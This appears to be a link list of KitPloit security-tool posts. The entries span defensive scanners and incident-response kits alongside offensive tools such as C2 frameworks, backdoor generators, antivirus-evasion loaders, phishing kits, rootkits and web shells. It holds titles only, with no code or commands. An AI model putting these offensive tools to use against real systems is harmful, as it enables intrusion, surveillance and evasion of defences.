- [RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints](https://www.kitploit.com/2023/05/rustchain-hide-memory-artifacts-using.html)
- [Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)](https://www.kitploit.com/2023/05/wafaray-enhance-your-malware-detection.html)
- [KoodousFinder - A Simple Tool To Allows Users To Search For And Analyze Android Apps For Potential Security Threats And Vulnerabilities](https://www.kitploit.com/2023/05/koodousfinder-simple-tool-to-allows.html)
- [ShadowSpray - A Tool To Spray Shadow Credentials Across An Entire Domain In Hopes Of Abusing Long Forgotten GenericWrite/GenericAll DACLs Over Other Objects In The Domain](http://www.kitploit.com/2023/05/shadowspray-tool-to-spray-shadow.html)
- [PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool](http://www.kitploit.com/2023/05/passmute-passmute-multi-featured.html)
- [Lfi-Space - LFI Scan Tool](http://www.kitploit.com/2023/05/lfi-space-lfi-scan-tool.html)
- [TLDHunt - Domain Availability Checker](http://www.kitploit.com/2023/05/tldhunt-domain-availability-checker.html)
- [Indicator-Intelligence - Finds Related Domains And IPv4 Addresses To Do Threat Intelligence After Indicator-Intelligence Collects Static Files](http://www.kitploit.com/2023/05/indicator-intelligence-finds-related.html)
- [Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications](http://www.kitploit.com/2023/05/teler-waf-go-http-middleware-that.html)
- [Spartacus - DLL Hijacking Discovery Tool](http://www.kitploit.com/2023/05/spartacus-dll-hijacking-discovery-tool.html)
- [Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target](http://www.kitploit.com/2023/05/fuzztruction-prototype-of-fuzzer-that.html)
- [NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints](http://www.kitploit.com/2023/05/ntlmrecon-tool-for-performing-light.html)
- [Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework](http://www.kitploit.com/2023/05/nimbo-c2-yet-another-simple-and.html)
- [Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover](http://www.kitploit.com/2023/05/domain-protect-owasp-domain-protect.html)
- [SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals](http://www.kitploit.com/2023/05/spidersuite-advance-web-spidercrawler.html)
- [Metlo - An Open-Source API Security Platform](http://www.kitploit.com/2023/05/metlo-open-source-api-security-platform.html)
- [Kubei - A Flexible Kubernetes Runtime Scanner](http://www.kitploit.com/2020/07/kubei-flexible-kubernetes-runtime.html)
- [hardCIDR - Linux Bash Script To Discover The Netblocks, Or Ranges, Owned By The Target Organization](http://www.kitploit.com/2023/03/hardcidr-linux-bash-script-to-discover.html)
- [REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications](http://www.kitploit.com/2023/05/recollapse-is-helper-tool-for-black-box.html)
- [Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework](http://www.kitploit.com/2023/04/sh4d0wup-signing-key-abuse-and-update.html)
- [FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable](http://www.kitploit.com/2023/04/firebaseexploiter-vulnerability.html)
- [Bearer - Code Security Scanning Tool (SAST) That Discover, Filter And Prioritize Security Risks And Vulnerabilities Leading To Sensitive Data Exposures (PII, PHI, PD)](http://www.kitploit.com/2023/04/bearer-code-security-scanning-tool-sast.html)
- [PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session](http://www.kitploit.com/2023/04/phonesploit-pro-all-in-one-hacking-tool.html)
- [PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness](http://www.kitploit.com/2023/04/portex-java-library-to-analyse-portable.html)
- [auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration](http://www.kitploit.com/2023/04/auditpolcis-cis-benchmark-testing-of.html)
- [KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective](http://www.kitploit.com/2023/04/kubestalk-discovers-kubernetes-and.html)
- [Nuclearpond - A Utility Leveraging Nuclei To Perform Internet Wide Scans For The Cost Of A Cup Of Coffee](http://www.kitploit.com/2023/04/nuclearpond-utility-leveraging-nuclei.html)
- [PowerMeUp - A Small Library Of Powershell Scripts For Post Exploitation That You May Need Or Use!](http://www.kitploit.com/2023/04/powermeup-small-library-of-powershell.html)
- [Striker - A Command And Control (C2)](http://www.kitploit.com/2023/04/striker-command-and-control-c2.html)
- [UDPX - Fast A nd Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones](http://www.kitploit.com/2023/04/udpx-fast-nd-lightweight-udpx-is-single.html)
- [Katana - A Next-Generation Crawling And Spidering Framework](http://www.kitploit.com/2023/04/katana-next-generation-crawling-and.html)
- [Wa-Tunnel - Tunneling Internet Traffic Over Whatsapp](http://www.kitploit.com/2023/04/wa-tunnel-tunneling-internet-traffic.html)
- [Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools](http://www.kitploit.com/2023/04/scriptkiddi3-streamline-your-recon-and.html)
- [Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy](http://www.kitploit.com/2023/04/nmap-api-uses-python310-debian-python.html)
- [GVision - A Reverse Image Search App That Use Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily](http://www.kitploit.com/2023/04/gvision-reverse-image-search-app-that.html)
- [debugHunter - Discover Hidden Debugging Parameters And Uncover Web Application Secrets](http://www.kitploit.com/2023/04/debughunter-discover-hidden-debugging.html)
- [Pinacolada - Wireless Intrusion Detection System For Hak5's WiFi Coconut](http://www.kitploit.com/2023/04/pinacolada-wireless-intrusion-detection.html)
- [QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications](http://www.kitploit.com/2023/04/quadrainspect-android-framework-that.html)
- [Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL](http://www.kitploit.com/2023/04/certwatcher-tool-for-capture-and.html)
- [Reportly - An AzureAD User Activity Report Tool](http://www.kitploit.com/2023/04/reportly-azuread-user-activity-report.html)
- [SilentMoonwalk - PoC Implementation Of A Fully Dynamic Call Stack Spoofer](http://www.kitploit.com/2023/04/silentmoonwalk-poc-implementation-of.html)
- [WindowSpy - A Cobalt Strike Beacon Object File Meant For Targetted User Surveillance](http://www.kitploit.com/2023/04/windowspy-cobalt-strike-beacon-object.html)
- [Seekr - A Multi-Purpose OSINT Toolkit With A Neat Web-Interface](http://www.kitploit.com/2023/04/seekr-multi-purpose-osint-toolkit-with.html)
- [Grepmarx - A Source Code Static Analysis Platform For AppSec Enthusiasts](http://www.kitploit.com/2023/04/grepmarx-source-code-static-analysis.html)
- [Shoggoth - Asmjit Based Polymorphic Encryptor](http://www.kitploit.com/2023/04/shoggoth-asmjit-based-polymorphic.html)
- [RedditC2 - Abusing Reddit API To Host The C2 Traffic, Since Most Of The Blue-Team Members Use Reddit, It Might Be A Great Way To Make The Traffic Look Legit](http://www.kitploit.com/2023/04/redditc2-abusing-reddit-api-to-host-c2.html)
- [CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares](http://www.kitploit.com/2023/04/cmloot-find-interesting-files-stored-on.html)
- [Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History](http://www.kitploit.com/2023/04/noseyparker-command-line-program-that.html)
- [Fingerprintx - Standalone Utility For Service Discovery On Open Ports!](http://www.kitploit.com/2023/03/fingerprintx-standalone-utility-for.html)
- [MSI Dump - A Tool That Analyzes Malicious MSI Installation Packages, Extracts Files, Streams, Binary Data And Incorporates YARA Scanner](http://www.kitploit.com/2023/03/msi-dump-tool-that-analyzes-malicious.html)
- [Apk.Sh - Makes Reverse Engineering Android Apps Easier, Automating Some Repetitive Tasks Like Pulling, Decoding, Rebuilding And Patching An APK](http://www.kitploit.com/2023/03/apksh-makes-reverse-engineering-android.html)
- [Decider - A Web Application That Assists Network Defenders, Analysts, And Researcher In The Process Of Mapping Adversary Behaviors To The MITRE ATT&CK Framework](http://www.kitploit.com/2023/03/decider-web-application-that-assists.html)
- [ThunderCloud - Cloud Exploit Framework](http://www.kitploit.com/2023/03/thundercloud-cloud-exploit-framework.html)
- [Waf-Bypass - Check Your WAF Before An Attacker Does](http://www.kitploit.com/2023/03/waf-bypass-check-your-waf-before.html)
- [QRExfiltrate - Tool That Allows You To Convert Any Binary File Into A QRcode Movie. The Data Can Then Be Reassembled Visually Allowing Exfiltration Of Data In Air Gapped Systems](http://www.kitploit.com/2023/03/qrexfiltrate-tool-that-allows-you-to.html)
- [Mimicry - Security Tool For Active Deception In Exploitation And Post-Exploitation](http://www.kitploit.com/2023/03/mimicry-security-tool-for-active.html)
- [APCLdr - Payload Loader With Evasion Features](http://www.kitploit.com/2023/03/apcldr-payload-loader-with-evasion.html)
- [PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library](http://www.kitploit.com/2023/03/portexanalyzergui-graphical-interface.html)
- [Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux](http://www.kitploit.com/2023/03/invoke-psobfuscation-in-depth-approach.html)
- [NimPlant - A Light-Weight First-Stage C2 Implant Written In Nim](http://www.kitploit.com/2023/03/nimplant-light-weight-first-stage-c2.html)
- [FindUncommonShares - A Python Equivalent Of PowerView's Invoke-ShareFinder.ps1 Allowing To Quickly Find Uncommon Shares In Vast Windows Domains](http://www.kitploit.com/2023/03/finduncommonshares-python-equivalent-of.html)
- [Ator - Authentication Token Obtain and Replace Extender](http://www.kitploit.com/2023/03/ator-authentication-token-obtain-and.html)
- [Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database](http://www.kitploit.com/2023/03/wifidb-script-to-parse-aircrack-ng.html)
- [GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data](http://www.kitploit.com/2023/03/gptvuln-analyzer-uses-chatgpt-api-and.html)
- [Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2023/03/kali-linux-20231-penetration-testing.html)
- [CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL](http://www.kitploit.com/2023/03/certwatcher-tool-for-capture-and.html)
- [CertVerify - A Scanner That Files With Compromised Or Untrusted Code Signing Certificates](http://www.kitploit.com/2023/03/certverify-scanner-that-files-with.html)
- [Graphicator - A GraphQL Enumeration And Extraction Tool](http://www.kitploit.com/2023/03/graphicator-graphql-enumeration-and.html)
- [MacOSThreatTrack - Bash Tool Used For Proactive Detection Of Malicious Activity On macOS Systems](http://www.kitploit.com/2023/03/macosthreattrack-bash-tool-used-for.html)
- [DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text](http://www.kitploit.com/2023/03/datasurgeon-quickly-extracts-ips-email.html)
- [Thunderstorm - Modular Framework To Exploit UPS Devices](http://www.kitploit.com/2023/03/thunderstorm-modular-framework-to.html)
- [RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry](http://www.kitploit.com/2023/03/redteam-physical-tools-red-team-toolkit.html)
- [X-force - IBM Security Utilitary Library In Python. Search And Query All Sources: Threat_Activities And Groups, Malware_Analysis, Industries](http://www.kitploit.com/2023/03/x-force-ibm-security-utilitary-library.html)
- [Cortex-XDR-Config-Extractor - Cortex XDR Config Extractor](http://www.kitploit.com/2023/03/cortex-xdr-config-extractor-cortex-xdr.html)
- [APKHunt - Comprehensive Static Code Analysis Tool For Android Apps That Is Based On The OWASP MASVS Framework](http://www.kitploit.com/2023/02/apkhunt-comprehensive-static-code.html)
- [IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File](http://www.kitploit.com/2023/02/ipgeo-tool-to-extract-ip-addresses-from.html)
- [SXDork - A Powerful Tool That Utilizes The Technique Of Google Dorking To Search For Specific Information On The Internet](http://www.kitploit.com/2023/02/sxdork-powerful-tool-that-utilizes.html)
- [CVE-Vulnerability-Information-Downloader - Downloads Information From NIST (CVSS), First.Org (EPSS), And CISA (Exploited Vulnerabilities) And Combines Them Into One List](http://www.kitploit.com/2023/02/cve-vulnerability-information.html)
- [Tracgram - Use Instagram Location Features To Track An Account](http://www.kitploit.com/2023/02/tracgram-use-instagram-location.html)
- [Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions](http://www.kitploit.com/2023/02/gmailc2-fully-undetectable-c2-server.html)
- [Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!](http://www.kitploit.com/2023/02/probablesubdomains-subdomains-analysis.html)
- [Reverseip_Py - Domain Parser For IPAddress.com Reverse IP Lookup](http://www.kitploit.com/2023/02/reverseippy-domain-parser-for.html)
- [Faraday - Open Source Vulnerability Management Platform](http://www.kitploit.com/2023/02/faraday-open-source-vulnerability.html)
- [ThreatHound - Tool That Help You On Your IR & Threat Hunting And CA](http://www.kitploit.com/2023/02/threathound-tool-that-help-you-on-your.html)
- [Upload_Bypass_Carnage - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!](http://www.kitploit.com/2023/02/uploadbypasscarnage-file-upload.html)
- [OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises](http://www.kitploit.com/2023/02/offensivepipeline-allows-you-to.html)
- [Misp-Extractor - Tool That Connects To A MISP Instance And Retrieves Attributes Of Specific Types (Such As IP Addresses, URLs, And Hashes)](http://www.kitploit.com/2023/02/misp-extractor-tool-that-connects-to.html)
- [Web-Hacking-Playground - Web Application With Vulnerabilities Found In Real Cases, Both In Pentests And In Bug Bounty Programs](http://www.kitploit.com/2023/02/web-hacking-playground-web-application.html)
- [Invoke-Transfer - PowerShell Clipboard Data Transfer](http://www.kitploit.com/2023/02/invoke-transfer-powershell-clipboard.html)
- [Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains](http://www.kitploit.com/2023/02/email-vulnerablity-checker-find-email.html)
- [DNSrecon-gui - DNSrecon Tool With GUI For Kali Linux](http://www.kitploit.com/2023/02/dnsrecon-gui-dnsrecon-tool-with-gui-for.html)
- [Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads](http://www.kitploit.com/2023/02/powershell-backdoor-generator.html)
- [Leaktopus - Keep Your Source Code Under Control](http://www.kitploit.com/2023/02/leaktopus-keep-your-source-code-under.html)
- [C99Shell-PHP7 - PHP 7 And Safe-Build Update Of The Popular C99 Variant Of PHP Shell](http://www.kitploit.com/2023/02/c99shell-php7-php-7-and-safe-build.html)
- [Darkdump2 - Search The Deep Web Straight From Your Terminal](http://www.kitploit.com/2023/02/darkdump2-search-deep-web-straight-from.html)
- [Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C](http://www.kitploit.com/2023/02/heapdetective-simple-way-to-detect-heap.html)
- [Winevt_Logs_Analysis - Searching .Evtx Logs For Remote Connections](http://www.kitploit.com/2023/02/winevtlogsanalysis-searching-evtx-logs.html)
- [EAST - Extensible Azure Security Tool - Documentation](http://www.kitploit.com/2023/02/east-extensible-azure-security-tool.html)
- [Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks](http://www.kitploit.com/2023/02/aws-security-assessment-solution-aws.html)
- [Suborner - The Invisible Account Forger](http://www.kitploit.com/2023/02/suborner-invisible-account-forger.html)
- [Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash](http://www.kitploit.com/2023/02/monomorph-md5-monomorphic-shellcode.html)
- [Sandfly-Entropyscan - Tool To Detect Packed Or Encrypt ed Binaries Related To Malware, Finds Malicious Files And Linux Processes And Gives Output With Cryptographic Hashes](http://www.kitploit.com/2023/01/sandfly-entropyscan-tool-to-detect.html)
- [DFShell - The Best Forwarded Shell](http://www.kitploit.com/2023/01/dfshell-best-forwarded-shell.html)
- [Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors](http://www.kitploit.com/2023/01/yaralyzer-visually-inspect-and-force.html)
- [SSTImap - Automatic SSTI Detection Tool With Interactive Interface](http://www.kitploit.com/2023/01/sstimap-automatic-ssti-detection-tool.html)
- [BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter](http://www.kitploit.com/2023/01/bluehound-tool-that-helps-blue-teams.html)
- [GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database](http://www.kitploit.com/2023/01/guac-aggregates-software-security.html)
- [DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts](http://www.kitploit.com/2023/01/dc-sonar-analyzing-ad-domains-for.html)
- [Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log](http://www.kitploit.com/2023/01/get-applockereventlog-script-for.html)
- [SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases](http://www.kitploit.com/2023/01/sqlidetector-helps-you-to-detect-sql.html)
- [Popeye - A Kubernetes Cluster Resource Sanitizer](http://www.kitploit.com/2023/01/popeye-kubernetes-cluster-resource.html)
- [Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java](http://www.kitploit.com/2023/01/tai-e-easy-to-learnuse-static-analysis.html)
- [Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws](http://www.kitploit.com/2023/01/ghauri-advanced-cross-platform-tool.html)
- [DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process](http://www.kitploit.com/2023/01/dragoncastle-poc-that-combines.html)
- [Kscan - Simple Asset Mapping Tool](http://www.kitploit.com/2023/01/kscan-simple-asset-mapping-tool.html)
- [APTRS - Automated Penetration Testing Reporting System](http://www.kitploit.com/2023/01/aptrs-automated-penetration-testing.html)
- [LATMA - Lateral Movement Analyzer Tool](http://www.kitploit.com/2023/01/latma-lateral-movement-analyzer-tool.html)
- [AVIator - Antivirus Evasion Project](http://www.kitploit.com/2023/01/aviator-antivirus-evasion-project.html)
- [Fuzzable - Framework For Automating Fuzzable Target Discovery With Static Analysis](http://www.kitploit.com/2023/01/fuzzable-framework-for-automating.html)
- [Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack](http://www.kitploit.com/2023/01/bkcrack-crack-legacy-zip-encryption.html)
- [KRIe - Linux Kernel Runtime Integrity With eBPF](http://www.kitploit.com/2023/01/krie-linux-kernel-runtime-integrity.html)
- [PowerHuntShares - Audit Script Designed In Inventory, Analyze, And Report Excessive Privileges Configured On Active Directory Domains](http://www.kitploit.com/2023/01/powerhuntshares-audit-script-designed.html)
- [TerraLdr - A Payload Loader Designed With Advanced Evasion Features](http://www.kitploit.com/2023/01/terraldr-payload-loader-designed-with.html)
- [YATAS - A Simple Tool To Audit Your AWS Infrastructure For Misconfiguration Or Potential Security Issues With Plugins Integration](http://www.kitploit.com/2023/01/yatas-simple-tool-to-audit-your-aws.html)
- [AceLdr - Cobalt Strike UDRL For Memory Scanner Evasion](http://www.kitploit.com/2023/01/aceldr-cobalt-strike-udrl-for-memory.html)
- [REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations](http://www.kitploit.com/2023/01/rest-attacker-designed-as-proof-of.html)
- [DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files](http://www.kitploit.com/2023/01/dotdumper-automatic-unpacker-and-logger.html)
- [ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version](http://www.kitploit.com/2023/01/exchangefinder-find-microsoft-exchange.html)
- [Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions](http://www.kitploit.com/2023/01/villain-windows-and-linux-backdoor.html)
- [PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager](http://www.kitploit.com/2023/01/pxethief-set-of-tooling-that-can.html)
- [Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework](http://www.kitploit.com/2023/01/subparse-modular-malware-analysis.html)
- [Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets](http://www.kitploit.com/2023/01/cypherhound-terminal-application-that.html)
- [Top 20 Most Popular Hacking Tools in 2022](http://www.kitploit.com/2022/12/top-20-most-popular-hacking-tools-in.html)
- [Aftermath - A Free macOS IR Framework](http://www.kitploit.com/2022/12/aftermath-free-macos-ir-framework.html)
- [Havoc - Modern and malleable post-exploitation command and control framework](http://www.kitploit.com/2022/12/havoc-modern-and-malleable-post.html)
- [OFRAK - Unpack, Modify, And Repack Binaries](http://www.kitploit.com/2022/12/ofrak-unpack-modify-and-repack-binaries.html)
- [Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound](http://www.kitploit.com/2022/12/autobloody-tool-to-automatically.html)
- [S3Crets_Scanner - Hunting For Secrets Uploaded To Public S3 Buckets](http://www.kitploit.com/2022/12/s3cretsscanner-hunting-for-secrets.html)
- [NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols](http://www.kitploit.com/2022/12/netllix-project-created-with-aim-to.html)
- [Squarephish - An advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes](http://www.kitploit.com/2022/12/squarephish-advanced-phishing-tool-that.html)
- [HTTPLoot - An Automated Tool Which Can Simultaneously Crawl, Fill Forms, Trigger Error/Debug Pages And "Loot" Secrets Out Of The Client-Facing Code Of Sites](http://www.kitploit.com/2022/12/httploot-automated-tool-which-can.html)
- [Kali Linux 2022.4 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2022/12/kali-linux-20224-penetration-testing.html)
- [Shennina - Automating Host Exploitation With AI](http://www.kitploit.com/2022/12/shennina-automating-host-exploitation.html)
- [laZzzy - Shellcode Loader, Developed Using Different Open-Source Libraries, That Demonstrates Different Execution Techniques](http://www.kitploit.com/2022/12/lazzzy-shellcode-loader-developed-using.html)
- [Octosuite - Advanced Github OSINT Framework](http://www.kitploit.com/2022/12/octosuite-advanced-github-osint.html)
- [AzureHound - Azure Data Exporter For BloodHound](http://www.kitploit.com/2022/12/azurehound-azure-data-exporter-for.html)
- [ADFSRelay - Proof Of Concept Utilities Developed To Research NTLM Relaying Attacks Targeting ADFS](http://www.kitploit.com/2022/12/adfsrelay-proof-of-concept-utilities.html)
- [FarsightAD - PowerShell Script That Aim To Help Uncovering (Eventual) Persistence Mechanisms Deployed By A Threat Actor Following An Active Directory Domain Compromise](http://www.kitploit.com/2022/12/farsightad-powershell-script-that-aim.html)
- [Codecepticon - .NET Application That Allows You To Obfuscate C#, VBA/VB6 (Macros), And PowerShell Source Code](http://www.kitploit.com/2022/12/codecepticon-net-application-that.html)
- [Legitify - Detect And Remediate Misconfigurations And Security Risks Across All Your GitHub Assets](http://www.kitploit.com/2022/12/legitify-detect-and-remediate.html)
- [Pyramid - A Tool To Help Operate In EDRs' Blind Spots](http://www.kitploit.com/2022/12/pyramid-tool-to-help-operate-in-edrs.html)
- [AzureGraph - Azure AD Enumeration Over MS Graph](http://www.kitploit.com/2022/12/azuregraph-azure-ad-enumeration-over-ms.html)
- [R4Ven - Track Ip And GPS Location](http://www.kitploit.com/2022/12/r4ven-track-ip-and-gps-location.html)
- [Pylirt - Python Linux Incident Response Toolkit](http://www.kitploit.com/2022/12/pylirt-python-linux-incident-response.html)
- [Klyda - Highly Configurable Script For Dictionary/Spray Attacks Against Online Web Applications](http://www.kitploit.com/2022/12/klyda-highly-configurable-script-for.html)
- [Scscanner - Tool To Read Website Status Code Response From The Lists](http://www.kitploit.com/2022/12/scscanner-tool-to-read-website-status.html)
- [Neton - Tool For Getting Information From Internet Connected Sandboxes](http://www.kitploit.com/2022/12/neton-tool-for-getting-information-from.html)
- [Shells - Little Script For Generating Revshells](http://www.kitploit.com/2022/12/shells-little-script-for-generating.html)
- [Pywirt - Python Windows Incident Response Toolkit](http://www.kitploit.com/2022/12/pywirt-python-windows-incident-response.html)
- [DomainDouche - OSINT Tool to Abuse SecurityTrails Domain Suggestion API To Find Potentially Related Domains By Keyword And Brute Force](http://www.kitploit.com/2022/12/domaindouche-osint-tool-to-abuse.html)
- [D4TA-HUNTER - GUI Osint Framework With Kali Linux](http://www.kitploit.com/2022/11/d4ta-hunter-gui-osint-framework-with.html)
- [Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products](http://www.kitploit.com/2022/11/pycrypt-python-based-crypter-that-can.html)
- [EvilTree - A Remake Of The Classic "Tree" Command With The Additional Feature Of Searching For User Provided Keywords/Regex In Files, Highlighting Those That Contain Matche](http://www.kitploit.com/2022/11/eviltree-remake-of-classic-tree-command.html)
- [Kubeeye - Tool To Find Various Problems On Kubernetes, Such As Application Misconfiguration, Unhealthy Cluster Components And Node Problems](http://www.kitploit.com/2022/11/kubeeye-tool-to-find-various-problems.html)
- [MSMAP - Memory WebShell Generator](http://www.kitploit.com/2022/11/msmap-memory-webshell-generator.html)
- [SharpSCCM - A C# Utility For Interacting With SCCM](http://www.kitploit.com/2022/11/sharpsccm-c-utility-for-interacting.html)
- [Octopii - An AI-powered Personal Identifiable Information (PII) Scanner](http://www.kitploit.com/2022/11/octopii-ai-powered-personal.html)
- [Scrcpy - Display And Control Your Android Device](http://www.kitploit.com/2022/11/scrcpy-display-and-control-your-android.html)
- [Stegowiper - A Powerful And Flexible Tool To Apply Active Attacks For Disrupting Stegomalware](http://www.kitploit.com/2022/11/stegowiper-powerful-and-flexible-tool.html)
- [Sandbox_Scryer - Tool For Producing Threat Hunting And Intelligence Data From Public Sandbox Detonation Output](http://www.kitploit.com/2022/11/sandboxscryer-tool-for-producing-threat.html)
- [Wodat - Windows Oracle Database Attack Toolkit](http://www.kitploit.com/2022/11/wodat-windows-oracle-database-attack.html)
- [Slicer - Tool To Automate The Boring Process Of APK Recon](http://www.kitploit.com/2022/11/slicer-tool-to-automate-boring-process.html)
- [nuvola - Tool To Dump And Perform Automatic And Manual Security Analysis On Aws Environments Configurations And Services](http://www.kitploit.com/2022/11/nuvola-tool-to-dump-and-perform.html)
- [TripleCross - A Linux eBPF Rootkit With A Backdoor, C2, Library Injection, Execution Hijacking, Persistence And Stealth Capabilities.](http://www.kitploit.com/2022/11/triplecross-linux-ebpf-rootkit-with.html)
- [Dismember - Scan Memory For Secrets And More](http://www.kitploit.com/2022/11/dismember-scan-memory-for-secrets-and.html)
- [Unblob - Extract Files From Any Kind Of Container Formats](http://www.kitploit.com/2022/11/unblob-extract-files-from-any-kind-of.html)
- [SCMKit - Source Code Management Attack Toolkit](http://www.kitploit.com/2022/11/scmkit-source-code-management-attack.html)
- [autoSSRF - Smart Context-Based SSRF Vulnerabiltiy Scanner](http://www.kitploit.com/2022/11/autossrf-smart-context-based-ssrf.html)
- [TeamFiltration - Cross-Platform Framework For Enumerating, Spraying, Exfiltrating, And Backdooring O365 AAD Accounts](http://www.kitploit.com/2022/11/teamfiltration-cross-platform-framework.html)
- [NGWAF - First Iteration Of ML Based Feedback WAF](http://www.kitploit.com/2022/11/ngwaf-first-iteration-of-ml-based.html)
- [RDPHijack-BOF - Cobalt Strike Beacon Object File (BOF) That Uses WinStationConnect API To Perform Local/Remote RDP Session Hijacking](http://www.kitploit.com/2022/11/rdphijack-bof-cobalt-strike-beacon.html)
- [Evilgophish - Evilginx2 + Gophish](http://www.kitploit.com/2022/11/evilgophish-evilginx2-gophish.html)
- [Collect-MemoryDump - Automated Creation Of Windows Memory Snapshots For DFIR](http://www.kitploit.com/2022/11/collect-memorydump-automated-creation.html)
- [Prefetch-Hash-Cracker - A Small Util To Brute-Force Prefetch Hashes](http://www.kitploit.com/2022/11/prefetch-hash-cracker-small-util-to.html)
- [Appshark - Static Taint Analysis Platform To Scan Vulnerabilities In An Android App](http://www.kitploit.com/2022/11/appshark-static-taint-analysis-platform.html)
- [VuCSA - Vulnerable Client-Server Application - Made For Learning/Presenting How To Perform Penetration Tests Of Non-Http Thick Clients](http://www.kitploit.com/2022/11/vucsa-vulnerable-client-server.html)
- [Jscythe - Abuse The Node.Js Inspector Mechanism In Order To Force Any Node.Js/Electron/V8 Based Process To Execute Arbitrary Javascript Code](http://www.kitploit.com/2022/11/jscythe-abuse-nodejs-inspector.html)
- [Cicd-Goat - A Deliberately Vulnerable CI/CD Environment](http://www.kitploit.com/2022/11/cicd-goat-deliberately-vulnerable-cicd.html)
- [Reverse_SSH - SSH Based Reverse Shell](http://www.kitploit.com/2022/10/reversessh-ssh-based-reverse-shell.html)
- [Ermir - An Evil Java RMI Registry](http://www.kitploit.com/2022/10/ermir-evil-java-rmi-registry.html)
